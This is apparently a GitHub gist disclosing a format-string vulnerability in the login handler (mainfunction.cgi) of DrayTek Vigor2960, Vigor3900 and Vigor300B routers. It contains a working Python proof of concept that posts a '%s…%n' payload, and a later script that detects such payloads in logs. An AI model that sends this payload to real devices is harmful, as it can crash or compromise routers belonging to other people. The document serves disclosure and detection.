@Cossack9989
Last active October 20, 2021 07:09
Affected devices

Vigor2960, Vigor3900, Vigor300B

Affected firmware version

<= 1.5.1.3

Discovered by

C0ss4ck @ Bytedance Wuheng Lab

Submission date

2021-07-21

CVSS Score

AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H, 9.0

PoC

from base64 import b64encode
import requests

data = {
 "action": "login",
 "formusername": b64encode(b"%s%s%s%s%s%s%s%s%n%n%n%n%n").decode(),
 "formpassword": b64encode(b"12345678").decode(),
 "formcaptcha": b64encode(b"123456").decode(),
 "rtick": "2345678"
}
header = {
 "Content-Type": "application/raw"
}
url = {
 "root": "http://192.168.1.1:80",
 "cgi": {
  "root": "/cgi-bin",
  "uri": {
   "mf": "/mainfunction.cgi",
  }
 }
}

def build_url(p1, p2=None):
 if p2:
  return url["root"] + url[p1]["root"] + url[p1]["uri"][p2]
 else:
  return url["root"] + url[p1]


session = requests.session()
r = session.post(build_url("cgi", "mf"), data=data, headers=header)
print(r)

Details

  • Location: mainfunction.cgi

Fix

DrayTek should publish new firmware.
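
Until fixed firmware is installed, login requests shaped like the PoC can be flagged in proxy or capture logs. The following is an added example, not part of the original gist and not DrayTek code: it decodes the base64 login fields and reports printf conversion specifiers. The function names, the sample bodies, and the assumption that the body is form-encoded (as `requests` sends a dict) are this example's own.

```python
import base64
import re
from urllib.parse import parse_qs, urlencode

# Fields the PoC sends base64-encoded in the login POST to mainfunction.cgi.
B64_FIELDS = ("formusername", "formpassword", "formcaptcha")

# One printf conversion: optional position, flags, width, precision, length
# modifier, then the conversion character.
FORMAT_SPEC = re.compile(
    rb"%(?:\d+\$)?[-+ #0]*(?:\d+|\*)?(?:\.(?:\d+|\*))?"
    rb"(?:hh|h|ll|l|j|z|t|L)?[diouxXeEfgGaAcspn]"
)


def inspect_login_body(body: str) -> list:
    """Return [(field, [specifiers])] for login fields that decode to
    printf conversions; undecodable fields are reported as well."""
    params = parse_qs(body, keep_blank_values=True)
    if params.get("action", [""])[0] != "login":
        return []
    findings = []
    for field in B64_FIELDS:
        for raw in params.get(field, []):
            try:
                # parse_qs turns an unescaped '+' into a space; undo that.
                decoded = base64.b64decode(raw.replace(" ", "+"), validate=True)
            except ValueError:
                findings.append((field, ["<invalid base64>"]))
                continue
            # A literal "%%" is not a conversion, so drop it before matching.
            specs = FORMAT_SPEC.findall(decoded.replace(b"%%", b""))
            if specs:
                findings.append((field, [s.decode() for s in specs]))
    return findings


def sample_body(username: bytes) -> str:
    """Constructed sample: a form-encoded body shaped like the PoC's request."""
    fields = {"action": "login", "rtick": "2345678",
              "formusername": base64.b64encode(username).decode(),
              "formpassword": base64.b64encode(b"12345678").decode(),
              "formcaptcha": base64.b64encode(b"123456").decode()}
    return urlencode(fields)


if __name__ == "__main__":
    print(inspect_login_body(sample_body(b"admin")))
    print(inspect_login_body(sample_body(b"%s%s%s%s%s%s%s%s%n%n%n%n%n")))
```

A username that legitimately contains a percent sign followed by a conversion character would also be reported, so treat hits as leads to review rather than as confirmed exploitation.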
